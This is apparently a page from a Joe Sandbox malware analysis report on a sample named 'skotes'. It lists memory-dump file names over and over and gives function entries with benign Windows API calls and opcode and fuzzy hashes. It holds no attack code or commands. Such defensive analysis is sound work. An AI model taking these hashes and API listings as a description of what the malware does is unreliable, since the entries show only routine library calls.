Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 1b5e27ea8ba2895f08a940fd053248c0eae8f72670d8246c5fb49ad31adec201
Instruction ID: 5b13ad72574ac4eb4213776f35c7a679ba703c56eedeb2d0fed4e19c4422ea38
Opcode Fuzzy Hash: 1b5e27ea8ba2895f08a940fd053248c0eae8f72670d8246c5fb49ad31adec201
Instruction Fuzzy Hash: 5B511570D00358DBEB24EF68CD49BEDB774DB45314F504299F814A7282EF389E848BA2

Function 00738B30 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,3EB2933D,?,00000000), ref: 00738B77

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: b0c139b7c4191e5835d891b0b45ff88848f0f7ee76d730b62a547ab298240564
Instruction ID: 7ce5601f29ac5824c2cd1f9b55f9b3b7d1d4370c8d62c3ec09fa43e94654e0d3
Opcode Fuzzy Hash: b0c139b7c4191e5835d891b0b45ff88848f0f7ee76d730b62a547ab298240564
Instruction Fuzzy Hash: CA51F571A012589BEB68DB28CC89BDDB775EB45314F0081D9E409A7282DB395F84CF92

Function 00767124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0076705B,?,?,00000000,00000000), ref: 00767166

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 8d9b66f3c8e95fe838a98350cd4ee63b736280d28539d656dc78c229dee62d8f
Instruction ID: 60cd1e14fcd620b3686e1bd1feb7aab6e8aeeab11c4d11633a15ce60be68c392
Opcode Fuzzy Hash: 8d9b66f3c8e95fe838a98350cd4ee63b736280d28539d656dc78c229dee62d8f
Instruction Fuzzy Hash: EE112E7290410CABDF19DE94C845EDF77BDAF49354F505263E916E2080FB34EA09CB61

Function 0076AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0076AC8D

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a88d0395170a6d4dbadf142edd8b346f6dfefdce6feed5c495be8be72b7561f5
Instruction ID: 9a9d940d41a3797316c3a64b374b9ed5eeffd6bdd7c22a026444a781053a6c1f
Opcode Fuzzy Hash: a88d0395170a6d4dbadf142edd8b346f6dfefdce6feed5c495be8be72b7561f5
Instruction Fuzzy Hash: 01111571A0420AAFCF05DF98E94599A7BF4EF48304F0580AAF809AB251D634EE21CB65

Function 0076D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0076A813,00000001,00000364,00000006,000000FF,?,0074D3FC,3EB2933D,?,00747A8B,?), ref: 0076D871

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9a2e06bf595b4aeaf8a26d56f5237cc97ecea841db8756b65e8f7636aeca8338
Instruction ID: 5cfd6461b1508485d0bf277b26b3c066847dd4d6dc5f40061277c9317174140d
Opcode Fuzzy Hash: 9a2e06bf595b4aeaf8a26d56f5237cc97ecea841db8756b65e8f7636aeca8338
Instruction Fuzzy Hash: 7DF0E931F21226A6DB312B729D0DA5B3758DF457B0B188121ED07A7182EA3CDC0085E0

Function 0076B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,3EB2933D,?,?,0074D3FC,3EB2933D,?,00747A8B,?,?,?,?,?,?,00737465,?), ref: 0076B07E

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
